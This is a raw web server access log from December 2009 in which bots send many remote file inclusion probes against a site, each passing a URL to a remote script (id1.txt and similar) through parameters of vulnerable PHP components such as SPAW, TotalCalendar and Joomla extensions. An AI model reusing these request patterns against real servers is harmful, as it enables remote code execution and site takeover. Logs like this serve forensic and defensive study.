95.110.198.81 - - [14/Dec/2009:08:14:07 -0800] "GET /logs/access_080701.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:14:11 -0800] "GET /logs/access_080701.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:13 -0800] "GET /logs/access_080617.log/config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:13 -0800] "GET /logs/config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:14 -0800] "GET /logs/access_080630.log/config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:14 -0800] "GET /config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:14 -0800] "GET /logs/config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:14 -0800] "GET /config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:14 -0800] "GET /logs/access_080630.log%20%20/config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:15:15 -0800] "GET /logs/access_080330.log%20%20/config.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:15:15 -0800] "GET /modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:15:16 -0800] "GET /logs//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:15:16 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:15:34 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:15:35 -0800] "GET /logs/access_090705.log%20%20//?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:15:36 -0800] "GET /logs//?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:15:36 -0800] "GET /?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 14919 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:15:50 -0800] "GET /logs/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [14/Dec/2009:08:15:52 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:15:54 -0800] "GET /index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 200 14821 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:15:57 -0800] "GET /logs/access_091013.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:15:57 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:15:57 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:15:59 -0800] "GET /logs/access_091203.log%20%20//?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:16:03 -0800] "GET /logs/access_091025.log%20%20/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:16:16 -0800] "GET /logs/access_090705.log//?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:16:16 -0800] "GET /logs//?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:16:17 -0800] "GET /?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 14920 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:29 -0800] "GET /logs/access_091013.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:29 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:29 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:16:31 -0800] "GET /logs/access_091203.log//?_zb_path=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:45 -0800] "GET /logs/access_091013.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:45 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:45 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:16:46 -0800] "GET /logs/access_091103.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:17:05 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:17:05 -0800] "GET /logs/access_091124.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:17:12 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:17:21 -0800] "GET /logs/access_091103.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:17:44 -0800] "GET /logs/access_091124.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:18:00 -0800] "GET /logs/access_091103.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:18:11 -0800] "GET /logs//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:18:11 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:18:13 -0800] "GET /modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:18:16 -0800] "GET /logs/access_071228.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:18:18 -0800] "GET /logs/access_080701.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:18:25 -0800] "GET /logs/access_091025.log%20%20/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:18:25 -0800] "GET /logs/index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:18:25 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:18:25 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:18:25 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [14/Dec/2009:08:18:26 -0800] "GET /index.php?dir=http://sowa.com.mx/site/templates/sken/id1(pirates).txt? HTTP/1.1" 200 14821 "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:18:29 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:18:39 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:18:43 -0800] "GET /logs/access_090130.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:18:44 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 130224 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:18:45 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 14938 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:18:49 -0800] "GET /logs/access_090130.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:18:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 14937 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:18:49 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 130224 "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:19:05 -0800] "GET /logs/access_071228.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:08:19:09 -0800] "GET /logs/access_080701.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:19:41 -0800] "GET /logs/access_091013.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:19:41 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:19:41 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.157.4.42 - - [14/Dec/2009:08:19:47 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
121.254.168.42 - - [14/Dec/2009:08:19:48 -0800] "GET ///?_index.php[DOCUMENT_ROOT]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 200 14814 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:20:01 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:20:05 -0800] "GET /logs/access_090919.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:08:20:07 -0800] "GET /logs/access_090919.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:20:08 -0800] "GET /logs/access_081029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.246.152.22 - - [14/Dec/2009:08:20:08 -0800] "GET /logs/access_081201.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [14/Dec/2009:08:20:13 -0800] "GET /logs/access_091103.log/////bbs//skin/ggambo7002_board/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:20:17 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?innc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:20:30 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:20:30 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:20:30 -0800] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:20:30 -0800] "GET /logs/access_080404.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:10 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:10 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:10 -0800] "GET /logs/access_080708.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:11 -0800] "GET /logs/access_080708.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:11 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:12 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:14 -0800] "GET /logs/access_080716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:22:16 -0800] "GET /logs/access_080322.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:22:16 -0800] "GET /logs/access_080329.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:16 -0800] "GET /logs/access_080716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:18 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:18 -0800] "GET /logs/access_080708.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:19 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:20 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:20 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:20 -0800] "GET /logs/access_080708.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:22 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:22 -0800] "GET /logs/access_080708.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:22 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:24 -0800] "GET /logs/access_080716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:24 -0800] "GET /logs/access_080716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:22:26 -0800] "GET /logs/access_080716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:23:04 -0800] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:23:04 -0800] "GET /logs/access_080716.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [14/Dec/2009:08:24:02 -0800] "GET ///index.php?DOCUMENT_ROOT=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 200 14808 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:24:37 -0800] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:24:41 -0800] "GET /logs/access_080716.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:25:56 -0800] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:25:59 -0800] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:26:04 -0800] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:26:04 -0800] "GET /logs/access_080716.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:26:04 -0800] "GET /logs/access_080716.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
